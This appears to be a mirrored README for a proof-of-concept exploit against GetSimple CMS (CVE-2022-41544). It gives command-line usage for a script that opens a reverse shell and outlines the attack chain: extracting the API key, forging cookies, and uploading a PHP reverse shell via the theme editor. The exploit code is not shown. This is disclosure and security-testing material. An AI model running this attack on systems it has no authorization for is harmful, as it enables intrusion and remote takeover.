来源

关联漏洞

介绍

# CVE-2022-41544 - GetSimple CMS RCE Exploit

## Overview

This repository contains a proof-of-concept exploit for **CVE-2022-41544**, a critical Remote Code Execution (RCE) vulnerability affecting GetSimple CMS version 3.3.16 and earlier.

## Vulnerability Details

- **CVE ID**: CVE-2022-41544
- **Vendor**: GetSimple CMS
- **Affected Versions**: ≤ 3.3.16
- **Vulnerability Type**: Remote Code Execution (RCE)
- **CVSS Score**: Critical (9.8)
- **Exploit POC Revision Date**: August 24, 2025

## Description

The vulnerability allows authenticated attackers to upload and execute arbitrary PHP code through the theme editor functionality, leading to remote code execution on the target system.

## Requirements

- Python 3.6+
- Network access to target GetSimple CMS installation
- Valid admin username for the target CMS

## Installation

1. Clone this repository:
```bash
git clone https://github.com/nopgadget/CVE-2022-41544
cd CVE-2022-41544
```

2. Ready to use - no additional dependencies required

## Usage

### Basic Usage
```bash
python3 exploit.py <target> <path> <ip:port> <username>
```

### With Interactive Shell
```bash
python3 exploit.py <target> <path> <ip:port> <username> --shell
```

### Parameters

- **`<target>`**: Target hostname or IP address
- **`<path>`**: Web path to GetSimple CMS installation (e.g., `/` or `/cms/`)
- **`<ip:port>`**: Your listener IP and port for reverse shell (e.g., `192.168.1.100:4444`)
- **`<username>`**: Admin username for the target CMS
- **`--shell`**: Optional flag to launch interactive telnet shell after exploit

### Example
```bash
python3 exploit.py example.com /cms/ 192.168.1.100:4444 admin --shell
```

## How It Works

1. **Version Detection**: Checks if the target CMS version is vulnerable
2. **API Key Extraction**: Retrieves the API key from the authorization.xml file
3. **Authentication Bypass**: Forges authentication cookies using the extracted API key
4. **CSRF Token Retrieval**: Obtains CSRF token from the theme editor
5. **Shell Upload**: Uploads a PHP reverse shell through the theme editor
6. **Shell Execution**: Triggers the uploaded shell to establish reverse connection

## Security Notice

⚠️ **WARNING**: This tool is for **EDUCATIONAL PURPOSES ONLY**. 

- Only use on systems you own or have explicit permission to test
- Unauthorized testing is illegal and unethical
- The authors are not responsible for any misuse of this tool
- Always follow responsible disclosure practices

## Mitigation

To protect against this vulnerability:

1. **Update GetSimple CMS** to version 3.3.17 or later
2. **Apply security patches** as soon as they become available
3. **Restrict access** to admin panels
4. **Use WAF rules** to block suspicious file uploads
5. **Monitor file uploads** for malicious content

## Testing Environment

- **OS**: Linux (tested on Ubuntu)
- **Python**: 3.6+
- **Target**: GetSimple CMS ≤ 3.3.16

## Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. The authors disclaim any liability for misuse of this tool.

## License

This project is for educational purposes only. Use responsibly and ethically.

文件快照

 [4.0K]  /data/pocs/f2dfc7898153a2d245bfccbbcdc6aaaaa057ddf9
├── [6.4K]  exploit.py
└── [3.2K]  README.md

0 directories, 2 files

备注